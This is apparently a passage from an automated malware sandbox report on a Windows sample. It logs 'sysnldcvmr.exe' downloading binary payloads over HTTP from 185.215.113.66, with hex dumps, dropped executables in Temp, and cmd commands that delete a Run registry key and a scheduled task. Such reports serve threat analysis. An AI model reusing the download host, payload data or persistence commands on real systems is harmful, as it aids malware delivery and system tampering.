                                                                  Nov 28, 2024 18:18:48.794778109 CET1236INData Raw: 67 14 51 95 3d b3 54 99 9a da 81 fc b7 14 12 2e 98 5e ac b1 fa 83 8b 5e 72 08 07 18 26 36 93 86 0e 4c 5e c4 84 31 fc 1b f4 c2 86 23 15 ae 6e e9 7a 33 d6 17 1e 43 cf 1b af e2 88 13 f3 c9 6a d5 1e 63 83 83 33 4d f4 a6 45 24 c6 a4 1e a2 0f 21 a5 82
                                                                  Data Ascii: gQ=T.^^r&6L^1#nz3Cjc3ME$!#b8jKWajy/'5nZe9m$5)^i|$p>P!t1a~i4n T'HMjEzkxn9qlWj_q=6GnC|K[Yu
                                                                  Nov 28, 2024 18:18:48.922482014 CET1236INData Raw: 83 cc 50 6d 19 87 5d 0f a0 59 a1 75 1a 55 87 4f 12 81 3e 07 c5 c8 99 bb 5a ab 96 a0 d1 93 3c 3a 8d 73 00 02 cf d0 0d 1d 43 4a 31 c0 43 bb 44 33 ff f4 85 f5 e5 22 2d b2 73 35 bb 4d ca ec e5 d3 95 6e d1 e6 06 6a 1c 25 e2 39 2d ad 06 74 b0 74 d2 b9
                                                                  Data Ascii: Pm]YuUO>Z<:sCJ1CD3"-s5Mnj%9-ttE)8.,Z-1ojcfT"skh/YQmFv24VD,`R;&-!Q'rc@=;W@RN:Q"d,M$:Y[fy<a e


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.1049712185.215.113.66807656C:\Windows\sysnldcvmr.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 28, 2024 18:18:49.693259001 CET166OUTGET /2 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034643888 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:50 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 10496
                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "67154d18-2900"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                  Nov 28, 2024 18:18:51.034725904 CET224INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;aj
                                                                  Nov 28, 2024 18:18:51.034739017 CET1236INData Raw: 57 2c cc 4e e9 93 b3 98 99 37 7f 26 84 18 f6 89 b3 51 4b 68 2e aa eb 28 5b 67 c2 09 58 43 b9 1d 1d 19 7e af c3 53 17 6c 0b ba b5 b6 6d f0 37 9e 17 bc da b3 c1 05 6c f2 93 67 30 bd 68 64 0b ea eb 37 92 a2 00 4e 6e 79 4d 38 25 da 04 51 66 b1 37 19
                                                                  Data Ascii: W,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!F`L4<c_^F992M\v)=Ov+uQP>"B SE<h76\
                                                                  Nov 28, 2024 18:18:51.034775019 CET1236INData Raw: 75 92 9f e1 f9 e6 29 3b 58 62 3c 3e ee 4d 5c ff 89 ad 07 e1 c5 53 10 04 a3 9b 91 41 50 dd 80 d7 b0 77 c1 85 ae 83 44 81 dd c0 04 63 a3 11 90 99 5b ae f0 f8 38 dd 71 2d 21 80 71 5d bd 04 ba d3 63 92 a2 37 99 76 70 90 bc 1a 82 be ff 2e d3 d1 f4 f7
                                                                  Data Ascii: u);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-70~?]$==T+TM^e~'O(wGX\1Y&$_xFLz
                                                                  Nov 28, 2024 18:18:51.034795046 CET1236INData Raw: f9 88 5f a6 24 ef 65 f7 e3 05 82 c5 fb 4d 84 3b 04 0e 42 92 eb 9b 6e 69 2c 39 59 3b 8f 70 7a 08 ac ae 40 45 98 6c 63 bf 2e 99 7d 94 9a 8b f1 c3 cc 4a 57 06 c2 3e e9 9a 34 3d 9c 5c 75 16 3d de bc 1d 46 0f 84 f9 25 bc c9 d9 aa 24 17 92 da 25 5f 5e
                                                                  Data Ascii: _$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@`{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWml
                                                                  Nov 28, 2024 18:18:51.034807920 CET1236INData Raw: 33 db 32 61 b3 d8 a6 03 60 93 23 26 f3 db ee b2 b6 8d 41 e9 57 78 64 89 3c 2c b2 17 d6 f6 a4 7f d9 76 5c 5d be de 02 8b 48 96 18 68 71 22 90 de 9d 34 6b 57 c9 fe 86 27 d7 fa 7b 1e 77 52 17 a8 34 f6 42 c9 a0 41 e9 93 3d 67 10 2d 53 92 19 a5 2a 4d
                                                                  Data Ascii: 32a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6Y=z)}s]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4
                                                                  Nov 28, 2024 18:18:51.034821033 CET1236INData Raw: 0e 6f ab 62 60 7c b0 1a 8a 00 94 62 f1 1b ab f5 db 53 f6 c3 63 f3 f2 56 9e 3c 8f 84 4e e0 13 c7 99 5e 0b bf 53 e6 4d 25 44 02 a3 7a 1d 2a 7f 61 ea 30 29 a1 ac 16 e6 e4 ce 74 93 05 15 d8 99 c1 dc 61 c8 99 e5 6f ff e0 a1 28 4a 81 cd 61 ff d7 cd 0d
                                                                  Data Ascii: ob`|bScV<N^SM%Dz*a0)tao(Jag{;5? w7m1j"zAJV,VjHN^C1uU\=AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2
                                                                  Nov 28, 2024 18:18:51.034974098 CET1236INData Raw: c7 b2 21 51 5b 02 28 fb d0 37 a8 0e 5f 60 45 13 ae e0 d7 f7 ac cd fd 41 47 37 46 e4 06 80 d3 00 31 a7 71 ee fb 51 f0 c3 5c 6c ec 9c fb 02 ba 5d e7 0a 8b da c9 8a aa 7a 17 c0 c3 58 dc 6d 6c 4d 69 8e ff 61 e4 f8 83 1f 0a fe d9 fe 0e 49 e3 78 30 66
                                                                  Data Ascii: !Q[(7_`EAG7F1qQ\l]zXmlMiaIx0f] KonttGp#3wdtgd(,v=-UsW^z]x&%tu=H%/}h+wy*(V#Qpg+I#rkr#rLw{bE*!NlH|3
                                                                  Nov 28, 2024 18:18:51.034989119 CET1236INData Raw: 83 0c 55 8b 0d 06 4d 91 1d e6 40 8d 8f 82 16 15 af 71 1f ce 8d fd ef 11 6f 0b c3 62 a3 38 a7 e9 91 07 45 04 ab 68 ed de 3d c1 0c 0b 24 ac 3c 82 09 6e 4b 7e 33 0a 3a 8e dc 23 f3 36 da 9d 60 0c 00 c6 bc c1 2c 51 c5 d8 a8 d7 5f f6 ff e8 11 4b cd 78
                                                                  Data Ascii: UM@qob8Eh=$<nK~3:#6`,Q_KxNo(Ul-&g+,'3%{s3_3I')#&r|Fd aIQ<dX=lLv=1pjqZ)zo6hymsjw\#i0+X
                                                                  Nov 28, 2024 18:18:51.035000086 CET649INData Raw: da ca 34 31 cb 8c dd 52 e1 dc 6d 55 5c 67 82 11 64 11 ba 62 ba d5 2e c2 ee 05 c7 dd 0e 36 46 60 93 3a 2b 50 b2 86 d9 02 4a 9d dd 8f 5d 10 90 20 83 07 06 0d 4e 94 42 c8 3c 52 75 87 3f f3 51 a2 4f b6 d8 46 4e f3 84 78 ca d1 fb 54 2b 2c 40 63 18 f5
                                                                  Data Ascii: 41RmU\gdb.6F`:+PJ] NB<Ru?QOFNxT+,@cp1/Fw@#y$wHsa!z_NwwofcwHsyGPgO/j>hcw0*5Yv[X'*jq$:+L<k


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.1049713185.215.113.66807656C:\Windows\sysnldcvmr.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 28, 2024 18:18:52.161539078 CET166OUTGET /2 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 185.215.113.66
                                                                  Nov 28, 2024 18:18:53.558790922 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:53 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 10496
                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "67154d18-2900"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                  Nov 28, 2024 18:18:53.558813095 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                  Nov 28, 2024 18:18:53.560559034 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                  Nov 28, 2024 18:18:53.560581923 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
                                                                  Nov 28, 2024 18:18:53.560594082 CET248INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
                                                                  Nov 28, 2024 18:18:53.562635899 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                  Nov 28, 2024 18:18:53.562689066 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                  Nov 28, 2024 18:18:53.562700033 CET248INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                  Nov 28, 2024 18:18:53.565061092 CET1236INData Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6
                                                                  Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
                                                                  Nov 28, 2024 18:18:53.565097094 CET224INData Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10
                                                                  Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"
                                                                  Nov 28, 2024 18:18:53.681180000 CET1236INData Raw: 09 dd 4e 8b 22 ca 5e 0c 07 45 5d 7a 0b 67 68 b7 ad fa 5b d6 21 a3 6e db 6c c4 f3 e4 d2 49 6f 6e d2 84 b7 9e 42 0f 04 d2 31 6a 85 84 67 d0 f6 27 90 bc 81 d5 7c f5 5d 77 3c 98 02 9e f6 4f a1 f7 79 7f 99 12 fa 13 fe 66 47 f4 1e e8 7f 25 57 bb 83 6c
                                                                  Data Ascii: N"^E]zgh[!nlIonB1jg'|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/`:JI]<KDZWdT6aMep>a<Wym+OdkXaKY;,SPXD@`7Geq


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:12:18:24
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\Desktop\LM94OE0VNK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\LM94OE0VNK.exe"
                                                                  Imagebase:0x9c0000
                                                                  File size:10'240 bytes
                                                                  MD5 hash:8CE09F13942AB5BCB81B175996C8385F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:12:18:30
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\2374323789.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2374323789.exe
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 75%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:12:18:33
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\sysnldcvmr.exe
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 75%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:12:18:45
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\240016073.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\240016073.exe
                                                                  Imagebase:0xe30000
                                                                  File size:8'704 bytes
                                                                  MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 79%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:12:18:45
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\sysnldcvmr.exe"
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                  Imagebase:0x7ff7c5210000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                  Imagebase:0x7ff7c5210000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                  Imagebase:0x7ff7f5060000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                  Imagebase:0x7ff696e40000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:12:18:50
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\2693731851.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2693731851.exe
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 75%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:36.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:26.3%
                                                                    Total number of Nodes:95
                                                                    Total number of Limit Nodes:5
